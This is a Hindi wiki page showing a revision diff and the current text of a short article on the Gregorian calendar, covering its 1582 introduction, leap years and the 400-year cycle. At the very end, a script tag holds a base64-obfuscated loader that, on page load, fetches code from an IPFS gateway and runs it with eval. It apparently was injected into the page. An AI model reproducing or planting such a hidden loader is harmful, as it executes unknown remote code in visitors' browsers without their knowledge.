Difference between revisions of "ग्रेगोरी कलॅण्डर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{आधार}} ग्रेगोरी कैलेंडर विश्व का सबसे अधिक उपयोग मे...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by one other user not shown)
Line 1: Line 1:
{{आधार}}
+
'''ग्रेगोरी कैलेंडर''' विश्व का सबसे अधिक उपयोग में लाया जाने वाला कलैंडर है। मूल रूप से यह [[जूलियन कलैंडर]] का रूपांतरण ही है। यह पोप ग्रेगोरी तेरहवें ने [[24 फ़रवरी]] 1582 प्रस्तुत किया था।
ग्रेगोरी कैलेंडर विश्व का सबसे अधिक उपयोग में लाया जाने वाला कलैंडर है। मूल रूप से यह [[जूलियन कलैंडर]] का रूपांतरण ही है। यह पोप ग्रेगोरी तेरहवें ने 24 फ़रवरी 1582 प्रस्तुत किया था।
+
==मुख्य बिंदु==
 +
* ग्रेगोरी कालदर्शक की मूल इकाई दिन होता है। 365 दिनों का एक [[वर्ष]] होता है, किन्तु हर चौथा वर्ष 366 दिन का होता है जिसे अधिवर्ष (लीप का साल) कहते हैं।
 +
* [[सूर्य]] पर आधारित [[पंचांग]] हर 146,097 दिनों बाद दोहराया जाता है। इसे 400 वर्षों मे बाँटा गया है और यह 20871 [[सप्ताह]] (7 दिनों) के बराबर होता है।
 +
* इन 400 वर्षों में 303 वर्ष आम वर्ष होते हैं, जिनमें 365 दिन होते हैं। और 97 लीप वर्ष होते हैं, जिनमें 366 दिन होते हैं।
 +
* हर वर्ष में 365 दिन, 5 घंटे, 49 मिनट और 12 सेकंड होते है।
 +
* इसे पोप ग्रेगोरी ने लागू किया था। इससे पहले जूलियन कालदर्शक प्रचलन में था, लेकिन उसमे अनेक त्रुटियाँ थीं, जिन्हे ग्रेगोरी कालदर्शक में दूर कर दिया गया।
 +
 
 +
 
 +
 
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
 
 +
{{कैलंडर2}}
  
 
[[Category:कैलंडर]]
 
[[Category:कैलंडर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:38, 25 May 2013

gregori kaileandar vishv ka sabase adhik upayog mean laya jane vala kalaiandar hai. mool roop se yah jooliyan kalaiandar ka roopaantaran hi hai. yah pop gregori terahavean ne 24 faravari 1582 prastut kiya tha.

mukhy biandu

  • gregori kaladarshak ki mool ikaee din hota hai. 365 dinoan ka ek varsh hota hai, kintu har chautha varsh 366 din ka hota hai jise adhivarsh (lip ka sal) kahate haian.
  • soory par adharit panchaang har 146,097 dinoan bad doharaya jata hai. ise 400 varshoan me baanta gaya hai aur yah 20871 saptah (7 dinoan) ke barabar hota hai.
  • in 400 varshoan mean 303 varsh am varsh hote haian, jinamean 365 din hote haian. aur 97 lip varsh hote haian, jinamean 366 din hote haian.
  • har varsh mean 365 din, 5 ghante, 49 minat aur 12 sekand hote hai.
  • ise pop gregori ne lagoo kiya tha. isase pahale jooliyan kaladarshak prachalan mean tha, lekin usame anek trutiyaan thian, jinhe gregori kaladarshak mean door kar diya gaya.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>